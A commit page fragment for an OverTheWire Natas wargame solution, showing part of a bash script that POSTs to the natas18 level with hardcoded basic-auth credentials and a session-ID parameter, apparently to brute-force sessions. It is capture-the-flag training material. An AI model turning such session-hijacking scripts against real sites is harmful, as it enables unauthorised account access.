<Natas> natas19.sh + writeup
This commit is contained in:
parent
9cd4fbcbf5
commit
503a8a0c5c
3 changed files with 125 additions and 5 deletions
|
|
@ -1,12 +1,10 @@
|
|||
#!/usr/bin/env bash
|
||||
|
||||
#curl -v --cookie "USER_TOKEN=Yes" http://127.0.0.1:5000/
|
||||
|
||||
USERNAME="admin"
|
||||
PASSWORD="arbitrary"
|
||||
|
||||
req() {
|
||||
SESSION_ID=$1
|
||||
local SESSION_ID=$1
|
||||
curl http://natas18.natas.labs.overthewire.org/index.php \
|
||||
-X POST \
|
||||
-u natas18:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ \
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue